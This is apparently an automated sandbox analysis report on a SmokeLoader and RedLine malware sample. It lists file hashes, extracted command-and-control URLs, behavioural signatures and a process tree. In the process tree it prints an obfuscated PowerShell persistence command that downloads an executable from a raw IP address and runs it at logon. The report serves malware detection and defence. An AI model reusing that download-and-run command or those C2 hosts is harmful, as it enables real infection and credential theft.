Analysis
-
max time kernel
150s -
max time network
195s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
13-08-2021 07:58
Static task
static1
Behavioral task
behavioral1
Sample
F4800660EB71CEAE41442CC4BFC4A37A.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
F4800660EB71CEAE41442CC4BFC4A37A.exe
Resource
win10v20210410
General
-
Target
F4800660EB71CEAE41442CC4BFC4A37A.exe
-
Size
179KB
-
MD5
f4800660eb71ceae41442cc4bfc4a37a
-
SHA1
98a68484de7ff7189bd61d0c04fbba83f2c20e45
-
SHA256
ca4bcfe479099c61e62b533e4ec5f667265ba2eb0884cbea492648ba3bdb8eb6
-
SHA512
20d345977a881d370e6d712162ee3c75056816829f6877f5c70a5795ea0678fa2b2a4d20a64ad29c3bf7ecd96e5649bb30858bf4f1fc786f3520a14cc4c0e85a
Malware Config
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Signatures
-
Detected phishing page
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
Processes:
DE9C.exeRuntimebroker.exeE1F7.exeE7C2.exeF441.exepid process 1456 DE9C.exe 1400 Runtimebroker.exe 744 E1F7.exe 996 E7C2.exe 848 F441.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
F441.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion F441.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion F441.exe -
Deletes itself 1 IoCs
Processes:
pid process 1180 -
Drops startup file 2 IoCs
Processes:
cmd.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe -
Loads dropped DLL 2 IoCs
Processes:
DE9C.exepid process 1456 DE9C.exe 1456 DE9C.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\F441.exe themida behavioral1/memory/848-90-0x0000000000A40000-0x0000000000A41000-memory.dmp themida -
Processes:
F441.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F441.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
F441.exepid process 848 F441.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
F4800660EB71CEAE41442CC4BFC4A37A.exedescription pid process target process PID 1016 set thread context of 2020 1016 F4800660EB71CEAE41442CC4BFC4A37A.exe F4800660EB71CEAE41442CC4BFC4A37A.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
F4800660EB71CEAE41442CC4BFC4A37A.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F4800660EB71CEAE41442CC4BFC4A37A.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F4800660EB71CEAE41442CC4BFC4A37A.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F4800660EB71CEAE41442CC4BFC4A37A.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
F4800660EB71CEAE41442CC4BFC4A37A.exepid process 2020 F4800660EB71CEAE41442CC4BFC4A37A.exe 2020 F4800660EB71CEAE41442CC4BFC4A37A.exe 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 1180 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 1180 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
F4800660EB71CEAE41442CC4BFC4A37A.exepid process 2020 F4800660EB71CEAE41442CC4BFC4A37A.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
F441.exepowershell.exedescription pid process Token: SeShutdownPrivilege 1180 Token: SeShutdownPrivilege 1180 Token: SeDebugPrivilege 848 F441.exe Token: SeDebugPrivilege 2028 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
pid process 1180 1180 1180 1180 -
Suspicious use of SendNotifyMessage 6 IoCs
Processes:
pid process 1180 1180 1180 1180 1180 1180 -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
F4800660EB71CEAE41442CC4BFC4A37A.exeDE9C.exeE1F7.exeRuntimebroker.exedescription pid process target process PID 1016 wrote to memory of 2020 1016 F4800660EB71CEAE41442CC4BFC4A37A.exe F4800660EB71CEAE41442CC4BFC4A37A.exe PID 1016 wrote to memory of 2020 1016 F4800660EB71CEAE41442CC4BFC4A37A.exe F4800660EB71CEAE41442CC4BFC4A37A.exe PID 1016 wrote to memory of 2020 1016 F4800660EB71CEAE41442CC4BFC4A37A.exe F4800660EB71CEAE41442CC4BFC4A37A.exe PID 1016 wrote to memory of 2020 1016 F4800660EB71CEAE41442CC4BFC4A37A.exe F4800660EB71CEAE41442CC4BFC4A37A.exe PID 1016 wrote to memory of 2020 1016 F4800660EB71CEAE41442CC4BFC4A37A.exe F4800660EB71CEAE41442CC4BFC4A37A.exe PID 1016 wrote to memory of 2020 1016 F4800660EB71CEAE41442CC4BFC4A37A.exe F4800660EB71CEAE41442CC4BFC4A37A.exe PID 1016 wrote to memory of 2020 1016 F4800660EB71CEAE41442CC4BFC4A37A.exe F4800660EB71CEAE41442CC4BFC4A37A.exe PID 1180 wrote to memory of 1456 1180 DE9C.exe PID 1180 wrote to memory of 1456 1180 DE9C.exe PID 1180 wrote to memory of 1456 1180 DE9C.exe PID 1180 wrote to memory of 1456 1180 DE9C.exe PID 1456 wrote to memory of 1400 1456 DE9C.exe Runtimebroker.exe PID 1456 wrote to memory of 1400 1456 DE9C.exe Runtimebroker.exe PID 1456 wrote to memory of 1400 1456 DE9C.exe Runtimebroker.exe PID 1456 wrote to memory of 1400 1456 DE9C.exe Runtimebroker.exe PID 1180 wrote to memory of 744 1180 E1F7.exe PID 1180 wrote to memory of 744 1180 E1F7.exe PID 1180 wrote to memory of 744 1180 E1F7.exe PID 1180 wrote to memory of 744 1180 E1F7.exe PID 1180 wrote to memory of 996 1180 E7C2.exe PID 1180 wrote to memory of 996 1180 E7C2.exe PID 1180 wrote to memory of 996 1180 E7C2.exe PID 1180 wrote to memory of 996 1180 E7C2.exe PID 1180 wrote to memory of 848 1180 F441.exe PID 1180 wrote to memory of 848 1180 F441.exe PID 1180 wrote to memory of 848 1180 F441.exe PID 1180 wrote to memory of 848 1180 F441.exe PID 1180 wrote to memory of 848 1180 F441.exe PID 1180 wrote to memory of 848 1180 F441.exe PID 1180 wrote to memory of 848 1180 F441.exe PID 744 wrote to memory of 960 744 E1F7.exe cmd.exe PID 744 wrote to memory of 960 744 E1F7.exe cmd.exe PID 744 wrote to memory of 960 744 E1F7.exe cmd.exe PID 744 wrote to memory of 960 744 E1F7.exe cmd.exe PID 1400 wrote to memory of 2028 1400 Runtimebroker.exe powershell.exe PID 1400 wrote to memory of 2028 1400 Runtimebroker.exe powershell.exe PID 1400 wrote to memory of 2028 1400 Runtimebroker.exe powershell.exe PID 1400 wrote to memory of 2028 1400 Runtimebroker.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\F4800660EB71CEAE41442CC4BFC4A37A.exe"C:\Users\Admin\AppData\Local\Temp\F4800660EB71CEAE41442CC4BFC4A37A.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\F4800660EB71CEAE41442CC4BFC4A37A.exe"C:\Users\Admin\AppData\Local\Temp\F4800660EB71CEAE41442CC4BFC4A37A.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\DE9C.exeC:\Users\Admin\AppData\Local\Temp\DE9C.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\E1F7.exeC:\Users\Admin\AppData\Local\Temp\E1F7.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat2⤵
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\E7C2.exeC:\Users\Admin\AppData\Local\Temp\E7C2.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\F441.exeC:\Users\Admin\AppData\Local\Temp\F441.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Runtimebroker.exeMD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
-
C:\ProgramData\Runtimebroker.exeMD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
-
C:\Users\Admin\AppData\Local\Temp\DE9C.exeMD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
-
C:\Users\Admin\AppData\Local\Temp\DE9C.exeMD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
-
C:\Users\Admin\AppData\Local\Temp\E1F7.exeMD5
b19ac380411ed5d8b5a7e7e0c1da61a6
SHA19665c20336a5ce437bbf7b564370bfa43e99954c
SHA256aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
SHA51273b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
-
C:\Users\Admin\AppData\Local\Temp\E1F7.exeMD5
b19ac380411ed5d8b5a7e7e0c1da61a6
SHA19665c20336a5ce437bbf7b564370bfa43e99954c
SHA256aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
SHA51273b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
-
C:\Users\Admin\AppData\Local\Temp\E7C2.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\E7C2.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\F441.exeMD5
717d65dba56f47e540dca074c3977b3d
SHA1d58aa30f826f41663e693f0ad930fdce584f1672
SHA25661fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3
SHA512b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d
-
C:\Users\Admin\AppData\Local\Temp\s.batMD5
a8bef84a0032e65adc157d70cf33a4f4
SHA1fb24b6d663880a5998947e96d6b96ff23c2e49ed
SHA25610ff0e85e512d5217de8f729643c361b8982c4386b49affb645d903cf1158c1a
SHA512c2c91b2dc890c8ac2afd853d760ff1ef2043fef58e99fa855947a7dc5d7312c1f991cf285ea10417745c8a463b68cdbe9faadf169731aad88249ed29fdb9909a
-
\ProgramData\Runtimebroker.exeMD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
-
\ProgramData\Runtimebroker.exeMD5
4f2f17aaf39970811b9f822b1496dc01
SHA1bf89cf8fbf826b02d4d3eebe8ef3aee1455dc876
SHA2563ea9f73f3772290bdfe770b50dc7c726098b6712d327acc90200b31980c8576b
SHA51244c35d1b0188a05c65fb5089ab5c6c5fb4baf65d3e6d065c96db167a5cccf344185a40fda256da69f518275670ca3e0bc1097064edb8cf0ac0c2c604cd1368a9
-
memory/744-83-0x0000000000400000-0x0000000002D86000-memory.dmpFilesize
41.5MB
-
memory/744-82-0x0000000003050000-0x0000000003293000-memory.dmpFilesize
2.3MB
-
memory/744-88-0x0000000004D40000-0x0000000004F51000-memory.dmpFilesize
2.1MB
-
memory/744-76-0x0000000000000000-mapping.dmp
-
memory/744-89-0x0000000000400000-0x0000000002D86000-memory.dmpFilesize
41.5MB
-
memory/848-84-0x0000000000000000-mapping.dmp
-
memory/848-99-0x00000000025E0000-0x00000000025E1000-memory.dmpFilesize
4KB
-
memory/848-90-0x0000000000A40000-0x0000000000A41000-memory.dmpFilesize
4KB
-
memory/960-95-0x0000000000000000-mapping.dmp
-
memory/996-98-0x0000000004A60000-0x0000000004A61000-memory.dmpFilesize
4KB
-
memory/996-79-0x0000000000000000-mapping.dmp
-
memory/996-92-0x0000000000F60000-0x0000000000F61000-memory.dmpFilesize
4KB
-
memory/1016-63-0x00000000001B0000-0x00000000001BA000-memory.dmpFilesize
40KB
-
memory/1180-64-0x00000000029D0000-0x00000000029E6000-memory.dmpFilesize
88KB
-
memory/1400-78-0x0000000000400000-0x0000000002C7C000-memory.dmpFilesize
40.5MB
-
memory/1400-73-0x0000000000000000-mapping.dmp
-
memory/1456-70-0x0000000000400000-0x0000000002C7C000-memory.dmpFilesize
40.5MB
-
memory/1456-65-0x0000000000000000-mapping.dmp
-
memory/1456-69-0x0000000000270000-0x00000000002AB000-memory.dmpFilesize
236KB
-
memory/2020-62-0x0000000075211000-0x0000000075213000-memory.dmpFilesize
8KB
-
memory/2020-60-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/2020-61-0x0000000000402E1A-mapping.dmp
-
memory/2028-101-0x0000000000000000-mapping.dmp
-
memory/2028-103-0x0000000002410000-0x000000000305A000-memory.dmpFilesize
12.3MB
-
memory/2028-104-0x00000000008F0000-0x00000000008F1000-memory.dmpFilesize
4KB
-
memory/2028-105-0x00000000046D0000-0x00000000046D1000-memory.dmpFilesize
4KB
-
memory/2028-106-0x0000000002410000-0x000000000305A000-memory.dmpFilesize
12.3MB
-
memory/2028-107-0x0000000002490000-0x0000000002491000-memory.dmpFilesize
4KB
-
memory/2028-108-0x0000000005340000-0x0000000005341000-memory.dmpFilesize
4KB
-
memory/2028-111-0x0000000005750000-0x0000000005751000-memory.dmpFilesize
4KB
-
memory/2028-113-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/2028-117-0x00000000057B0000-0x00000000057B1000-memory.dmpFilesize
4KB